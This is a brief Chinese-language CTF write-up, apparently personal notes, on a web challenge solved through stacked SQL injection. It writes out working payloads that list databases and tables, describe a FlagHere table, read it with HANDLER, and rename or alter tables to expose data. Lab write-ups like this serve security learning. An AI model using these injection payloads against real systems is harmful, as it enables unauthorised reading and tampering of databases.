坏了,好熟悉的感觉,好像之前做过类似的题目,甚至大致模板都一样
找到了:BUUCTF [web专题7] [强网杯 2019]随便注-CSDN博客
我记得是用堆叠注入来获取库表之类的
而且只能获取1,2的数据,其他数据(数字,字符等)全都不显示好像
查库
1';show databases;
再爆表
1';show tables;#
出来了,进入FlagHere
1';desc FlagHere;#
flag就在这里
我记得原本我总结了两种方法,一种是用handler获取flag,另一种是替换words的数据来进行输出获取flag
第一种:handler
1';handler FlagHere open as a;handler a read next;#
出现flag
第二种:顶替words来输出数据
1';rename table words to test;rename table FlagHere to words;alter table words add id int unsigned;alter table words change flag data varchar(100);#
ok了,rename,alter被过滤掉了,第二种方法不行,还是用handler吧